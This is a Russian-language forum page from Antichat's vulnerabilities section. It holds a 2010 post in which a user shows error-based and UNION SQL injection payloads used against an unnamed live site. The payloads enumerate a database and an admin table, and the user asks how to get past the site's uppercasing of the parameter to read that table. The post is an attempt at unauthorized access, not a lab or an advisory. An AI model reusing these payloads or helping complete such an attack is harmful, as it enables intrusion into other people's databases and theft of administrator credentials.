FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Опции темы

Поиск в этой теме

Опции просмотра

#11

10.05.2010, 20:42

AWD

Новичок

Регистрация: 05.05.2010

Сообщений: 1

Провел на форуме:
13360

Репутация: 0

Хелп! ...если это вообще возможно...

есть скуля:
/?id='')or+(select+count(*)+from+information_schema .tables+group+by+concat((select+(concat(table_sche ma,':',table_name))+from+information_schema.column s+where+column_name+like+'%pass%'+limit+0,1),floor (rand(0)*2)))+--+

имеем Duplicate entry 'a1323:tbladmin1' for key 1

база a1323, табла tbladmin

а тут:

/?id='')UNION+SELECT*from+(SELECT+*+FROM+tbladmin+J OIN+tbladmin+b)a+--+

выводит такую ошибку
Table 'a1323.TBLADMIN' doesn't exist

дело в том, что там id переводится в апперкейс.
возможно ли как-то с этим бороться? хексы, чары и прочие известные мне приблуды в FROM не годятся. значит должны быть НЕизвестные...
а? что скажете, господа

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules